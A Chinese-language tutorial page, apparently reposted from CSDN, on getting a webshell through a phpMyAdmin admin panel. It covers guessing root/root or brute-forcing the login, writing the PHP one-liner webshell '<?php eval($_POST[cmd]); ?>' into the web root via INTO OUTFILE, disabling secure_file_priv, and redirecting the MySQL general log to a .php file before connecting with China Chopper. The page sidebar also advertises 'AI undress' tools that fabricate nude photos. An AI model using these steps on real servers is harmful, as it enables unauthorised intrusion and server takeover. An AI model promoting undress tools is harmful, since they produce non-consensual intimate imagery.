搜尋
首頁資料庫php我的管理者PhpMyAdmin後台getshell(滲透測試)

下面由phpmyadmin教學欄位來介紹PhpMyAdmin後台getshell(滲透測試),希望對需要的朋友有幫助!

PhpMyAdmin簡介

PhpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的資料庫管理工具,讓管理者可用Web介面管理MySQL資料庫。藉由此Web介面可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。
PhpMyAdmin後台getshell(滲透測試)
在透過對目標進行資訊收集探測後,當發現存有phpmyadmin目錄(可試下:http://ip:連接埠/phpmyadmin/ )時,進而透過弱口令(可以直接嘗試下帳號root密碼root)或暴力破解進入管理後台之後,有多種方法進行getshell。
PhpMyAdmin後台getshell(滲透測試)

into outfile匯出木馬

想在網站內部插入木馬,前提是你得知道網站的絕對路徑,方法也有很多,例如透過報錯取得路徑,透過phpinfo.php等等(可參考另一篇部落格文章:https://blog.csdn.net/weixin_39190897/article/details/99078864 )。

最方便的是用select @@basedir;直接查(但有時沒辦法查出來,只能另尋它法):
PhpMyAdmin後台getshell(滲透測試)

根據上面的回饋,我們可以看到MySQL 的位置在D:\soft\phpStudy\MySQL\目錄下。

取得網站路徑後就可以企圖上傳木馬了,最常用的是透過into outfile在網站根目錄上直接寫入一句話木馬:

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:\soft\phpStudy\www\xxx.php';

#但在新版的mysql中,這句話並沒有運行成功。
PhpMyAdmin後台getshell(滲透測試)
Mysql新特性secure_file_priv會對讀寫檔案產生影響,該參數用來限制匯入匯出。我們可以藉助show global variables like '%secure%';指令來檢視參數:
PhpMyAdmin後台getshell(滲透測試)
secure_file_priv為NULL時,表示限制Mysql不允許匯入導出,所以爆出錯誤。要使得該語句導出成功,則需要在Mysql資料夾下修改my.ini 文件,在[mysqld]內加入secure_file_priv ="" 即可:
PhpMyAdmin後台getshell(滲透測試)
secure_file_priv的值沒有具體值時,表示不對mysqld 的導入|匯出做限制,此時就可以執行匯出指令。

利用Mysql日誌文件

Mysql 5.0版本以上會建立日誌文件,透過修改日誌的全域變量,也可以getshell。但是也要對產生的日誌有可讀可寫的權限。 (註:linux因為權限問題親測沒有成功)。先來介紹兩個MySQL全域變數:general_loggeneral_log file

  1. general log 指的是日誌儲存狀態,ON代表開啟OFF代表關閉;
  2. general log file 指的是日誌的保存路徑。

查看日誌狀態的指令:show variables like '%general%';
PhpMyAdmin後台getshell(滲透測試)
在上述設定中,開啟general時,所執行的sql語句都會出現在WIN-30DFNC8L78A.log

那麼,如果修改general_log_file的值,那麼所執行的sql語句就會對應生成,進而getshell。
PhpMyAdmin後台getshell(滲透測試)PhpMyAdmin後台getshell(滲透測試)
對應就會產生xxx.php檔
PhpMyAdmin後台getshell(滲透測試)
將一句話木馬寫入xxx.php檔:SELECT '<?php eval ($_POST["cmd"]);?>'
PhpMyAdmin後台getshell(滲透測試)
接著可以看到日誌檔案中記錄了木馬語句:
PhpMyAdmin後台getshell(滲透測試)最後中國菜刀連接,getshell :
PhpMyAdmin後台getshell(滲透測試)

以上是PhpMyAdmin後台getshell(滲透測試)的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文轉載於:csdn。如有侵權,請聯絡admin@php.cn刪除
MySQL和PhpMyAdmin的角色:詳細的故障MySQL和PhpMyAdmin的角色:詳細的故障Apr 11, 2025 am 12:14 AM

MySQL和phpMyAdmin的角色分別是存儲和管理數據、提供用戶友好的數據庫管理界面。 MySQL通過SQL進行數據操作,phpMyAdmin通過HTTP請求與MySQL交互,轉換用戶操作為SQL命令。

phpmyadmin連接數據庫phpmyadmin連接數據庫Apr 10, 2025 pm 11:09 PM

通過 phpMyAdmin 連接數據庫的方法:訪問 phpMyAdmin 網站,使用憑據登錄。選擇要連接的數據庫。在“操作”選項卡下選擇“導出”選項。配置導出設置,選擇格式、表和數據范圍。保存導出的文件。在目標數據庫中選擇“導入”選項卡並瀏覽導出的文件。點擊“執行”按鈕,然後使用“查詢”選項卡驗證導入是否成功。

phpmyadmin怎麼連接oraclephpmyadmin怎麼連接oracleApr 10, 2025 pm 11:03 PM

通過以下步驟連接 phpMyAdmin 至 Oracle 數據庫:1. 安裝 Oracle 驅動程序;2. 創建數據庫連接,包括主機、用戶名、密碼、端口和類型;3. 保存設置以建立連接;4. 從 phpMyAdmin 中選擇連接的 Oracle 數據庫即可管理和使用它。

phpmyadmin建立數據表phpmyadmin建立數據表Apr 10, 2025 pm 11:00 PM

要使用 phpMyAdmin 創建數據表,以下步驟必不可少:連接到數據庫並單擊“新建”標籤。為表命名並選擇存儲引擎(推薦 InnoDB)。通過單擊“添加列”按鈕添加列詳細信息,包括列名、數據類型、是否允許空值以及其他屬性。選擇一個或多個列作為主鍵。單擊“保存”按鈕創建表和列。

phpmyadmin連接mysqlphpmyadmin連接mysqlApr 10, 2025 pm 10:57 PM

如何使用 phpMyAdmin 連接到 MySQL?訪問 phpMyAdmin 的 URL,通常為 http://localhost/phpmyadmin 或 http://[您的服務器 IP 地址]/phpmyadmin。輸入您的 MySQL 用戶名和密碼。選擇您要連接的數據庫。點擊 "連接" 按鈕以建立連接。

phpmyadmin自動增長idphpmyadmin自動增長idApr 10, 2025 pm 10:54 PM

phpMyAdmin 中設置自動增長 ID 的步驟:打開 phpMyAdmin 並連接到數據庫。選擇要創建自動增長 ID 的表。在“結構”選項卡中,勾選“主鍵”部分的“自動增長”複選框。在“從”和“到”字段中輸入自動增長 ID 的起始值和結束值。單擊“保存”按鈕。設置自動增長 ID 的優勢包括:簡化數據插入。確保唯一性。優化性能。易於識別。需要注意的事項:確保自動增長 ID 範圍足夠大。重複值可能無法

phpmyadmin怎麼打開phpmyadmin怎麼打開Apr 10, 2025 pm 10:51 PM

可以通過以下步驟打開 phpMyAdmin:1. 登錄網站控制面板;2. 找到並點擊 phpMyAdmin 圖標;3. 輸入 MySQL 憑據;4. 點擊 "登錄"。

PHP如何使用phpMyadmin創建Mysql數據庫PHP如何使用phpMyadmin創建Mysql數據庫Apr 10, 2025 pm 10:48 PM

phpMyAdmin 可用於在 PHP 項目中創建數據庫。具體步驟如下:登錄 phpMyAdmin,點擊“新建”按鈕。輸入要創建的數據庫的名稱,注意符合 MySQL 命名規則。設置字符集,如 UTF-8,以避免亂碼問題。

See all articles

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

AI Hentai Generator

AI Hentai Generator

免費產生 AI 無盡。

熱門文章

R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
3 週前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳圖形設置
3 週前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.如果您聽不到任何人,如何修復音頻
3 週前By尊渡假赌尊渡假赌尊渡假赌
WWE 2K25:如何解鎖Myrise中的所有內容
3 週前By尊渡假赌尊渡假赌尊渡假赌

熱工具

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

強大的PHP整合開發環境

Atom編輯器mac版下載

Atom編輯器mac版下載

最受歡迎的的開源編輯器

Safe Exam Browser

Safe Exam Browser

Safe Exam Browser是一個安全的瀏覽器環境,安全地進行線上考試。該軟體將任何電腦變成一個安全的工作站。它控制對任何實用工具的訪問,並防止學生使用未經授權的資源。

SublimeText3 Linux新版

SublimeText3 Linux新版

SublimeText3 Linux最新版

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用